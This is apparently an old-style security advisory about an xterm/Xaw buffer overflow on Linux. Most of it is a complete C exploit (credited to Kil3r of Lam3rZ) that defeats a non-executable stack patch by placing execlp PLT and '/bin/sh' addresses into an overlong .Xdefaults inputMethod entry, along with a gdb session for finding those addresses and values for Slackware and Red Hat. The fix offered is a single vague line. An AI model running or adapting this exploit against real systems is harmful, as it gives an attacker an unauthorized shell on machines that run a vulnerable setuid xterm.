COMMAND

    xterm

SYSTEMS AFFECTED

    Linux

PROBLEM

    M.C.Mar  developed   exploit  that   works  around   nonexecutable
    stackpatch  (Linux),  but  for  xterm  and  Xaw vulnerability.  It
    seemed  that  defeating  Sorar's  stackpatch  is  easyier  than we
    thought if program  contains any exec*  PLT entry.  If it contains
    exec*p we may use any  string to execute ./_anystring_ if  we have
    . in PATH variable.   This exploit simply puts the  EXECLP address
    and its  parameters addresses  onto the  stack.   To work fine you
    need to look for execlp  Program Linkage Table entry in  xterm and
    for "/bin/sh" string in its text segment...

        emsi:~mcmar/hack# gdb xterm
        GDB is free software and you are welcome to distribute copies of it
         under certain conditions; type "show copying" to see the conditions.
        There is absolutely no warranty for GDB; type "show warranty" for details.
        GDB 4.16 (i486-slackware-linux),
        Copyright 1996 Free Software Foundation, Inc...(no debugging symbols found)...
        (gdb) print execlp
        $1 = {<text variable, no debug info>} 0x804bc78 <execlp>
        (gdb) x/s 0x8063d2e
        0x8063d2e <_fini+8158>:  "/bin/sh"

    0x804bc78 and 0x8063d2e were OK  in tested case, but you  may need
    to look for the right ones in your case.  M.C.Mar added lately:

    In slackware (3.4): EXECLP should be 0x804bc78, and BIN_SH - 0x8063d2e;
    In Redhat (5.0) : EXECLP should be 0x804b1cc, adn BIN_SH - 0x80626f2;

    Exploit follows:

    /*
     Based  on  Solar   Designer's:  "Getting  around   non-executable
     stack(fix)"  post   and:   Rafał   Wojtczuk's  "Defeating   Solar
     Designer'a Non-executable Stack Patch"

     sploit by  Kil3r of  Lam3rZ against  both Xaw  and neXtaw widgets
     based on xterm_exp.c by alcuin

     Compile it like this:
     gcc 3xterm.c -L /usr/X11/lib/ -lXaw -lXmu -lXt -lSM -lICE -lXext -lX11 -lc

     GreetZ: bulba, smierc, all of  Lam3rZ teem and other Polish HackerZ ;)
    */

    #include <stdlib.h>
    #include <stdio.h>
    #include <ctype.h>


    #define CONFFILE ".Xdefaults"
    #define OLDFILE ".Xdefaults.old"
    #define NEWFILE ".Xdefaults.new"

    #define EXECLP 0x804bc78  // execlp PLT adress in xterm
    #define BIN_SH 0x8063d2e  // "/bin/sh" string address in xterm ;)


    int *ptr;

    void main(int argc, char *argv[]) {

      char *home;
      FILE *f_in, *f_out;
      char buff[16384];
      char shellbuf[16384];
      char *s;
      int i;


      if (home = getenv("HOME")) chdir(home);

      if (!(f_out = fopen(NEWFILE, "w"))) {
        perror("fopen");
        exit(1);
      }



      if (f_in = fopen(CONFFILE, "r")) {
        fseek(f_in,0,SEEK_SET);
        while (!feof(f_in)) {
          fgets(buff,16384,f_in);
          for (s=buff;isblank(*s);s++);
          if (strncmp(s,"xterm*inputMethod",17)<0)
            fputs(buff,f_out);
        }
        fclose(f_in);
      }

      /* fill the buffer with nops */
      memset(shellbuf, 0x90, sizeof(shellbuf));
      shellbuf[sizeof(shellbuf)-1] = 0;


      ptr = (int *)(shellbuf+1028);
      *ptr++ =EXECLP;
      *ptr++ =EXECLP;
      *ptr++ =BIN_SH;
      *ptr++ =BIN_SH;
      *ptr++ = 0;


      fputs("xterm*inputMethod:",f_out);
      fputs(shellbuf, f_out);
      fclose(f_out);

      system("/bin/cp "CONFFILE" "OLDFILE);
      system("/bin/mv -f "NEWFILE" "CONFFILE);

      execl("/usr/X11R6/bin/xterm","xterm",NULL);
    }

SOLUTION

    Newer release of X fixed this overflow I think.